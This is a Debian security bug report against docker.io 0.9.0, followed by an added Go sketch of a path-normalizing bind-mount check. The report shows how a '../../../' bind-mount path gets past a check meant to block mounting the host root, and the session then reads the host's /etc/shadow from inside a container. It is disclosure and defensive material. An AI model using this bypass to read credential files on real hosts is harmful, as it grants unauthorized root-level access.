Package: docker.io
Version: 0.9.0+dfsg1-1
Tags: security
Severity: important
joey@darkstar:~ docker.io run -v /:/mnt -t -i mydebian bash
2014/03/22 22:56:23 Invalid bind mount: source can't be '/'
joey@darkstar:~ docker.io run -v ../../../:/mnt -t -i debian bash
root@b7647a89f0d7:/# wc -l /mnt/etc/shadow
42 /mnt/etc/shadow
IMHO, this is a straight-up security hole. Non-root users should not be
allowed to expose outside system paths into the container. The check for
/ implies I'm right; the absurdly bad implementation of the check is
... worrying.
Note README.Debian does not indicate that the docker group gives the
user root, either inside or outside the container.
As noted in the upstream documentation (https://docs.docker.io), Docker will
allow non-root users in the docker group to access docker.sock and thus
communicate with the daemon.
-- System Information:
Debian Release: jessie/sid
APT prefers unstable
APT policy: (500, 'unstable'), (500, 'testing'), (1, 'experimental')
Architecture: amd64 (x86_64)
Foreign Architectures: i386
Kernel: Linux 3.10-3-amd64 (SMP w/4 CPU cores)
Locale: LANG=en_US.utf8, LC_CTYPE=en_US.utf8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash
Versions of packages docker.io depends on:
ii adduser 3.113+nmu3
ii init-system-helpers 1.18
ii iptables 1.4.21-1
ii libapparmor1 2.8.0-5+b1
ii libc6 2.18-4
ii libdevmapper1.02.1 2:1.02.83-2
ii libsqlite3-0 3.8.3.1-1
ii perl 5.18.2-2+b1
Versions of packages docker.io recommends:
ii aufs-tools 1:3.2+20130722-1.1
ii ca-certificates 20140223
ii git 1:1.9.1-1
ii xz-utils 5.1.1alpha+20120614-2
docker.io suggests no packages.
-- no debconf information
--
see shy jo
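Added illustration, not part of the original report and not Docker's own code: the session above is consistent with a check that compares the bind source to the literal string "/" before any path normalization. The sketch below contrasts that with a check applied to the resolved path; the function names and the working directory /home/joey are assumptions made for the example.

```go
package main

import (
	"errors"
	"fmt"
	"path/filepath"
	"strings"
)

// Error text taken from the session in the report.
var errRootSource = errors.New("Invalid bind mount: source can't be '/'")

// naiveCheck (hypothetical) rejects only the literal string "/" as the source.
func naiveCheck(spec string) error {
	src, _, _ := strings.Cut(spec, ":")
	if src == "/" {
		return errRootSource
	}
	return nil
}

// canonicalCheck (hypothetical) resolves the source against cwd, the directory
// the command was typed in, and normalizes it lexically before testing it.
// Symlinks are not resolved here; a complete check would also call
// filepath.EvalSymlinks on the host that performs the mount.
func canonicalCheck(spec, cwd string) (string, error) {
	src, _, ok := strings.Cut(spec, ":")
	if !ok || src == "" {
		return "", errors.New("bind spec must be source:destination")
	}
	if !filepath.IsAbs(src) {
		src = filepath.Join(cwd, src)
	}
	src = filepath.Clean(src)
	if src == "/" {
		return src, errRootSource
	}
	return src, nil
}

func main() {
	cwd := "/home/joey" // constructed working directory
	specs := []string{"/:/mnt", "../../../:/mnt", "/./:/mnt", "/srv/data:/mnt"}
	for _, spec := range specs {
		src, err := canonicalCheck(spec, cwd)
		fmt.Printf("%-16s naive=%v canonical=%v (resolved %q)\n",
			spec, naiveCheck(spec), err, src)
	}
}
```

Normalizing the path only makes the '/' test mean what it says; it does not change who may talk to the daemon, which is the separate point raised about the docker group.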